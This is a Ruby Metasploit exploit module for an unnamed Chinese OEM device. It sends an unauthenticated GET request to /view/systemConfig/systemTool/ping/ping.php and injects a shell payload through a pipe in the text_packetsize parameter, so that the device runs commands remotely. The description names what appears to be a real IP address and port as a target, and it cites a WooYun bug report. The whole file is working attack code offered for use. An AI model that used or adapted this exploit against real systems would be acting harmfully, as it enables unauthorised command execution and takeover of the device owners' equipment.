require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
                      'Name' => '	某OEM产品设备任意四处任意命令及getshell',
                      'Description' => %q{
                           /view/systemConfig/systemTool/ping/ping.php, 无需登录等认证即可执行任意系统命令 https://58.62.220.170:9090
      },
                      'Author' =>
                          [
                              'YY-2012',
                              '扶摇直上打飞机'
                          ],
                      'License' => MSF_LICENSE,
                      'References' =>
                          [
                              ['url', 'http://www.wooyun.org/bugs/wooyun-2010-0192732']
                          ],
                      'Privileged' => true,
                      'Platform' => ['unix'],
                      'Targets' => [['all of them', {}],],
                      'Arch' => ARCH_CMD,
                      'DefaultTarget' => 0,
          ))
    register_options(
        [
            Opt::RHOST(),
            Opt::RPORT(9090),
            OptBool.new('SSL', [true, 'Negotiate SSL/TLS for outgoing connections', true]),
            OptString.new('TARGETURI', [true, 'The URI of the Centreon Application', '/']),
        ], self.class)
  end

  def exploit
    print_status("start to exploit ....")
    res = send_request_cgi(
        {
            'method' => 'GET',

            'uri' => normalize_uri(target_uri.path, "view", "systemConfig", "systemTool", "ping", "ping.php"),
            'headers' =>
                {
                    "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0",
                },
            'vars_get' =>
                {
                    'text_target' => '127.0.0.1',
                    'text_pingcount' => '1',
                    'text_packetsize' => "10 | #{payload.encoded}"
                }
        }, 4)
  end

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  def targeturi
    datastore['TARGETURI']
  end

end